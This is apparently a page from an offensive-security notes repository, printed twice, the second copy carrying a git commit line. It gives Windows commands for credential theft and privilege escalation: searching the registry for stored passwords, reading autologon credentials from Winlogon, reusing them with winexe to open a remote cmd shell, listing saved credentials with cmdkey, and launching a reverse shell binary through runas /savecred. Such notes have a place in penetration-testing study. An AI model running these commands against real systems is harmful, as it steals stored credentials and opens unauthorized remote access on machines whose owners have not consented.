killchain-compendium/Exploits/Windows/Password in Registry.md

# Password Inside Registry Key

* Query passwords saved inside the registry
```sh
reg query HKLM /f password /t REG_SZ /s
```
* Admin Autologon credentials
```
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
* On attacker, change the credentials on target
```sh
winexe -U 'admin%password' //<target-IP> cmd.exe
```

## List other Creds
```
cmdkey /list
```
* Open reverse shell
```sh
runas /savecred /user:admin C:\shell.exe
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Password Inside Registry Key`

			`* Query passwords saved inside the registry`
			```sh
			`reg query HKLM /f password /t REG_SZ /s`
			```
			`* Admin Autologon credentials`
			```
			`reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"`
			```
			`* On attacker, change the credentials on target`
			```sh
			`winexe -U 'admin%password' //<target-IP> cmd.exe`
			```

			`## List other Creds`
			```
			`cmdkey /list`
			```
			`* Open reverse shell`
			```sh
			`runas /savecred /user:admin C:\shell.exe`
			```